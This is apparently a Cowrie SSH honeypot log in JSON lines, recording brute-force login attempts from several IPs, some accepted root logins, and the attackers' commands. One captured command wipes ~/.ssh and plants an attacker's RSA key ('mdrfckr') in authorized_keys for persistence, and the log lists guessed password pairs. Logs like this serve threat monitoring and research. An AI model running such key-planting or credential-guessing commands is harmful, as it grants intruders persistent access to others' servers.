{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:54.495909Z","src_ip":"45.125.211.194","session":"d8c05657e06e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55898,"dst_ip":"1.2.3.4","dst_port":22,"session":"df5eb25d821d","protocol":"ssh","message":"New connection: 212.227.235.229:55898 (1.2.3.4:22) [session: df5eb25d821d]","sensor":"my-vps","timestamp":"2025-08-28T03:30:04.283614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:04.284548Z","src_ip":"212.227.235.229","session":"df5eb25d821d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:04.530929Z","src_ip":"212.227.235.229","session":"df5eb25d821d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:05.272451Z","src_ip":"212.227.235.229","session":"df5eb25d821d"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":40518,"dst_ip":"1.2.3.4","dst_port":22,"session":"08c2acb825e1","protocol":"ssh","message":"New connection: 186.225.142.90:40518 (1.2.3.4:22) [session: 08c2acb825e1]","sensor":"my-vps","timestamp":"2025-08-28T03:30:05.892918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:06.005668Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:06.195296Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:06.520308Z","src_ip":"212.227.235.229","session":"df5eb25d821d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":36360,"dst_ip":"1.2.3.4","dst_port":22,"session":"aacd62a7317a","protocol":"ssh","message":"New connection: 45.125.211.194:36360 (1.2.3.4:22) [session: aacd62a7317a]","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.038712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.049608Z","src_ip":"45.125.211.194","session":"aacd62a7317a"}
{"eventid":"cowrie.login.success","username":"root","password":"088863222*!!!@","message":"login attempt [root/088863222*!!!@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.121719Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.251423Z","src_ip":"45.125.211.194","session":"aacd62a7317a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:30:07.531487Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.532267Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.735260Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:07.742702Z","src_ip":"186.225.142.90","session":"08c2acb825e1"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:08.089629Z","src_ip":"45.125.211.194","session":"aacd62a7317a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:09.301230Z","src_ip":"45.125.211.194","session":"aacd62a7317a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46120,"dst_ip":"1.2.3.4","dst_port":22,"session":"761cda4193c6","protocol":"ssh","message":"New connection: 212.227.235.229:46120 (1.2.3.4:22) [session: 761cda4193c6]","sensor":"my-vps","timestamp":"2025-08-28T03:30:12.468286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:30:12.759988Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:30:12.846148Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#qweQWE","message":"login attempt [root/123!@#qweQWE] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:30:14.110808Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:30:14.426603Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:30:14.427335Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:30:14.428259Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:14.686242Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:30:14.886842Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:30:14.887603Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:30:15.257698Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:15.258894Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46121,"dst_ip":"1.2.3.4","dst_port":22,"session":"8258b0e96304","protocol":"ssh","message":"New connection: 212.227.235.229:46121 (1.2.3.4:22) [session: 8258b0e96304]","sensor":"my-vps","timestamp":"2025-08-28T03:30:15.348954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:30:15.349609Z","src_ip":"212.227.235.229","session":"8258b0e96304"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:30:15.441995Z","src_ip":"212.227.235.229","session":"8258b0e96304"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:15.901818Z","src_ip":"212.227.235.229","session":"8258b0e96304"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.133358Z","src_ip":"212.227.235.229","session":"8258b0e96304"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46122,"dst_ip":"1.2.3.4","dst_port":22,"session":"a983cf6bbe9b","protocol":"ssh","message":"New connection: 212.227.235.229:46122 (1.2.3.4:22) [session: a983cf6bbe9b]","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.231719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.232472Z","src_ip":"212.227.235.229","session":"a983cf6bbe9b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.329625Z","src_ip":"212.227.235.229","session":"a983cf6bbe9b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.752412Z","src_ip":"212.227.235.229","session":"a983cf6bbe9b"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.845177Z","src_ip":"212.227.235.229","session":"761cda4193c6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:17.846380Z","src_ip":"212.227.235.229","session":"a983cf6bbe9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48100,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f275dca108","protocol":"ssh","message":"New connection: 212.227.125.160:48100 (1.2.3.4:22) [session: 78f275dca108]","sensor":"my-vps","timestamp":"2025-08-28T03:30:18.869269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:18.870490Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:19.086439Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:30:19.737047Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:30:20.190494Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:30:20.191225Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:20.409189Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:20.410214Z","src_ip":"212.227.125.160","session":"78f275dca108"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58368,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4b6209b9ca2","protocol":"ssh","message":"New connection: 45.125.211.194:58368 (1.2.3.4:22) [session: f4b6209b9ca2]","sensor":"my-vps","timestamp":"2025-08-28T03:30:21.794882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:21.802024Z","src_ip":"45.125.211.194","session":"f4b6209b9ca2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"